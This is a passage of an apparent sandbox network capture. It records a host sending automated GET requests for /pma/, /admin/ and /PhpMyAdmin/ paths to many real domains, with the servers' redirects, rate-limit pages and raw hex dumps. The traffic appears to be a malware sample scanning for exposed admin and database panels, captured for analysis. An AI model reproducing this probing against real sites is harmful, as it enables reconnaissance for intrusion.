c8 23 c1 f2 26 b3 b6 a0 f0 47 c9 47 a1 f7 ff e8 6f cf e9 0b 95 17 cc f2 a1 00 8f 44 4a 5a 90 d8 f6 fa 65 08 71 0a de b2 4d b2 1c 42 6f c4 61 5c 28 6d 57 2a c7 3c b6 59 18 c3 88 47 40 ab 97 16 e1 92 5b ce 04 35 11 13 10 76 bc 33 f2 0d ce 41 c8 a9 e5 56 c0 d9 2f 2c 05 22 95 25 89 2a 65 4c 9e 3d 3d ea 76 3a 27 e4 77 2e 8c 92 e4 15 cb b9 98 92 d7 d2 94 9a c9 08 4e 83 59 d7 aa 90 3d ad 86 ca 9a bd a5 8c bd 9c 4d 28 cf 11 98 16 1a 9c cc 81 60 3a 85 3d 9c 7c e7 54 70 79 41 34 88 70 2f 96 c6 15 24 60 a3 6c 8f 64 f8 14 ee 05 81 b1 cc 1a 7f 5c f8 91 ca ef d7 91 20 af f1 53 a5 52 01 ac e0 e6 fe 9d a3 b6 3f 56 3a c6 0b f3 19 5d bc 5d 2f cf 63 c2 82 96 cc e2 f2 ec b4 c0 15 b1 a2 10 3c c2 85 2a 19 68 63 be 9f e4 02 af 9c 83 a1 b7 c1 61 f2 4c b3 3f 4a 75 42 5e 01 c4 de 8c d3 73 39 31 83 20 18 57 3d 49 d5 c2 17 1d 4e 49 90 60 75 e0 7d 4d 3d 18 cd 1c b7 6b 3e 53 58 34 6f 5b 51 f8 e4 c9 e9 2e a5 e4 5d c6 0d 31 dc 02 29 0d 18 62 33 20 ff ac 76 48 9e 4b 26 a6 96 47 86 0c a7 e4 df 4a 1a 1c 03 05 f1 34 43 fa 42 94 29 97 64 74 e4 77 fb 7e 9b 50 f2 9b e1 32 5d e9 b1 9a 45 17 ee 88 92 a5 bc f1 d8 cf 67 38 7c 8e 53 89 23 94 2e e5 fc ac 2c 0c 6e b1 a1 44 a9 2c 89 4a ad 71 0a 34 06 43 9e f0 b4 d4 10 13 74 cb 2e 66 f0 71 1c 98 4d a3 c6 12 34 91 38 2e 6a 51 84 95 38 99 b4 ce 76 20 63 6e b3 db 53 72 59 4d bf ce 6d c0 5a 9c 03 47 66 12 84 3f 17 fb 64 a9 f7 7a d2 48 c5 e0 ca 97 25 55 45 70 2f 3f e7 16 98 48 f3 c2 ce 73 62 61 62 83 73 36 62 b3 53 ef 6c 27 f8 8e 9c ee be 7f f1 e3 f3 77 cf df 93 ef 82 9d 31 97 b1 1a fb 9f c6 05 e4 ea 9c bf 5d 48 0d c9 a5 37 64 06 7e d3 c2 1b cc e3 f1 21 f8 10 18 7f ec 2b 9d 7e 08 78 ce 52 30 1f 30 17 1a 3e 04 55 f3 87 a0 83 9b f4 db 1f 82 c3 ee e4 b0 fb 21 f0 5a 1e 0a c0 7e bf 90 29 be 98 51 fa 65 78 d8 58 a1 e1 ef cb 19 20 3e b9 77 55 ea 08 bc c1 a5 87 eb 74 8b 71 6d 73 fc 0a 7e 63 9e f1 aa a0 5c 46 a2 8c 1d eb b9 a9 0e aa 7e aa 41 00 8e ee e7 5c fa e7 e6 87 11 e8 f0 c0 ef fb Data Ascii: rksxfnyrL@&XA],NH$Zkft7/$8KiC`2eLW#&GGoDJZeqMBoa\(mW<YG@[5v3AV/,"%eL==v:'w.NY=M(`:=\|TpyA4p/$`ld\ SR?V:]]/c<*hcaL?JuB^s91 W=INI`u}M=k>SX4o[Q.]1)b3 vHK&GJ4CB)dtw~P2]Eg8\|S#.,nD,Jq4Ct.fqM48.jQ8v cnSrYMmZGf?dzH%UEp/?Hsbabs6bSl'w1]H7d~!+~xR00>U!Z~)QexX >wUtqms~c\F~A\
Feb 21, 2024 00:26:13.900966883 CET	1286	IN	Data Raw: 3d ef ea ea 04 0d dc 9d 25 3e e1 b8 11 fc c5 5c 28 9a 02 66 05 f9 63 e7 e9 6e 52 ca c8 72 25 1b bc 25 9b 97 23 a6 89 6a 99 16 9c 2c ce 49 d4 80 e6 a5 d5 d3 ea ce 86 97 a6 2c 0a a5 ed 3b 30 d6 0c a0 65 79 8e 4f 2c 2f 06 0d 09 63 f2 23 02 37 fd 11 Data Ascii: =%>\(fcnRr%%#j,I,;0eyO,/c#7%I [4c`^7?j\!Ol^+QE94GBdVLbZ1mvXpjXnp*f)jrE>~$+MR<`K-C0m,5/~o?^5
Feb 21, 2024 00:26:13.900994062 CET	1286	IN	Data Raw: 4e 8d 9d 0a 20 3c 0e f7 c6 05 ad 3a 68 75 64 28 97 82 4b a0 91 31 7b c4 4e 0b 08 f7 2c 4c 6c e0 de cf 76 76 9e f0 3c 45 31 d4 e4 5c c0 b4 45 dc 6b d5 4e 2e 77 9e 3c 89 b9 29 04 9b 0e c8 0c 84 ec f2 dc 79 c6 a4 3d c1 db a1 d2 31 e8 01 91 aa e6 6a Data Ascii: N <:hud(K1{N,Llvv<E1\EkN.w<)y=1jBMpx@v3.rS.M~5OnVkU,cqDA{3{3}(TtAj33IY[`Q2aKSj&#<f.#Q`f47fK~yn-s
Feb 21, 2024 00:26:13.901005030 CET	145	IN	Data Raw: 9d a1 9d b1 0d 95 8e 81 95 93 3b 98 70 04 1c ab 73 b0 7f 1d 0a 3c eb ef e3 5f 93 ec 2f c8 d1 a5 76 eb a0 7b ef 8c c6 a5 b9 b8 c7 88 bd 56 a7 d3 bd 1e f1 f8 b8 75 84 36 1f 77 af 99 0f f6 5b 47 18 9b f6 d1 5d d4 05 13 40 55 04 4c de cd db af b8 af Data Ascii: ;ps<_/v{Vu6w[G]@ULyVB}pGnNeh;G]/m4
Feb 21, 2024 00:26:13.901704073 CET	1286	IN	Data Raw: b3 b4 bf 61 7b 89 42 68 c3 ff 04 4a 4d ce 84 18 90 4e af 98 6c 2e ca 21 e6 65 3e 20 dd f6 b6 2a c1 74 8a 21 ef 1d 6c 2b 9a 2c ca fa dd 5b 65 a6 60 11 97 29 a5 dd f6 80 b4 fd 7e 5f 43 be a9 a4 57 95 1c 1c 6e 29 e9 63 49 67 cb fd be bb f7 f7 b7 54 Data Ascii: a{BhJMNl.!e> t!l+,[e`)~_CWn)cIgT`En+9;Rr%~$cS-55ucdv1@vMwS7w#*Ke\|4[Mf:3pMQML)+\HTfPSrEK<a
Feb 21, 2024 00:26:13.901715040 CET	1286	IN	Data Raw: d8 77 1a 18 3b 15 70 b6 73 8a 97 17 44 83 08 f7 aa 13 93 01 d8 3d c2 e3 70 ef fc 8f 12 f4 d4 4f 98 8c a6 43 35 f1 73 2e 69 64 cc 1e c9 34 24 e1 5e 66 6d 31 08 82 31 17 46 c9 84 e5 5c 4c b9 34 a5 c6 72 f0 23 95 07 28 2d 42 29 b8 a0 a0 10 65 8a 97 Data Ascii: w;psD=pOC5s.id4$^fm11F\L4r#(-B)eO4,"2j8\|a:<~oi*vi1!HuRX/m3.U&8:j.a#]>Z54bZ#Eh:+!a_AzuYS(iY5)h%`iU+!1.
Feb 21, 2024 00:26:13.901770115 CET	1286	IN	Data Raw: bd 62 72 b2 73 ab 86 45 17 a9 56 a5 8c 51 bd 50 7a 40 9e 26 d5 a7 a6 74 06 37 2f d3 e9 90 35 48 bb b5 f8 f3 bb fb a4 79 bb c9 c2 c4 6e 6c 39 bc d9 21 d8 10 c4 c6 e2 a3 fd ba 6a 53 0e b7 b7 ed d7 b6 81 d6 6a 39 ca d3 f8 a0 77 d0 3b 5c ad 1a 96 d6 Data Ascii: brsEVQPz@&t7/5Hynl9!jSj9w;\b&;(maaM6O\4]J)Xe: zUKXv7,fXXe]n&lG&wRuU7ksKe:kV,g:HU`]<>8;2
Feb 21, 2024 00:26:13.901777983 CET	186	IN	Data Raw: af 9f ad be 9f 06 19 b0 18 34 be 9e ee 52 4a c2 ea 43 2a 43 fa ed fe e2 9d d2 45 bd 41 bf 70 0f 8b a1 5d 21 d6 79 ab f0 88 be b8 ae 06 e4 12 b4 b7 ae 29 eb 9e 61 1f d2 77 6f dd f4 ce 7e 71 f4 3f 2b 4b 5e a9 52 c6 4e 64 6f bd 8a dd db e4 e5 82 86 Data Ascii: 4RJC*CEAp]!y)awo~q?+K^RNdoVO..UU\|QdJjL5O3-F6J4/,q=zh6iuA!/s4+
Feb 21, 2024 00:26:13.904509068 CET	410	IN	Data Raw: aa 9c 59 cb a3 c5 0d e5 39 1a 4f a3 58 a2 56 63 83 e5 ab 7f 6e 7e c8 b9 e4 c9 34 4c 98 30 f0 8c e5 c5 c9 08 74 d8 e9 75 bb fd 63 e8 f6 f7 8f bb 07 0c 7a d0 39 3a f2 08 8f 43 6f 01 59 64 ca 2a 49 cf 8d 73 68 36 0a c6 fa 91 27 b5 19 e4 60 02 b7 d8 Data Ascii: Y9OXVcn~4L0tucz9:CoYdIsh6'`6P)kf}7Ce_I(cTNXN.m=SZ_T5fo+X4 j"/Uy0WGg_1eGH89[VU2]-!u%/~\|

Session ID	Source IP	Source Port	Destination IP	Destination Port
358	192.168.2.6	63604	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.558337927 CET	164	OUT	GET /pma/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.652777910 CET	214	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/pma/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:13.859605074 CET	214	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/pma/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
359	192.168.2.6	63498	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.619406939 CET	177	OUT	GET /admin/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.782490969 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
360	192.168.2.6	63649	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.659292936 CET	168	OUT	GET /admin HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.818455935 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
361	192.168.2.6	63650	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.659353018 CET	169	OUT	GET /admin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.821083069 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
362	192.168.2.6	63651	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.660505056 CET	169	OUT	GET /admin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.817133904 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
363	192.168.2.6	63713	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:13.721993923 CET	181	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:13.874119997 CET	844	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/PhpMyAdmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471573.7611478898838118268 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLhe/Ft074qYAt5jyfc2Z/bHu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRaltD60oxiiTg1Hu0/S4Rf2rfFKMF1/ova9YX8ig4AlelEYN3OeJKxguuFYGStMTT8rg==,2UNV7KOq4oGjA5+PKsX47K15rLvEnClnBsBBVIBt3LYfbJaKSXYQ/lskq2jK6SGP,O/1L7HVJdzQznP2rkpsRxjnWIsxCDt4gAQNDCnrR7Tg=,esXX8rTfzq2RRUC1xyAPv6D492b3qqr7SqQvqDE7ViE=,/j+AjfLiOiE0Vc9NsP8sK5C483KhHL0nZ8WejdH6PvV3rMRpwhuqafklhVFdC7d9sdHr4zo+FezP22KH3yZA0A== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
364	192.168.2.6	63887	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:14.220974922 CET	165	OUT	GET /pma/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:14.316251040 CET	215	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:14 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/pma/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
365	192.168.2.6	63976	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:14.660795927 CET	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:14.838694096 CET	533	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:14 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/PhpMyAdmin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
366	192.168.2.6	63188	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:14.709289074 CET	168	OUT	GET /admin HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:14.889625072 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:14 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 39 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b Data Ascii: 59c<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var 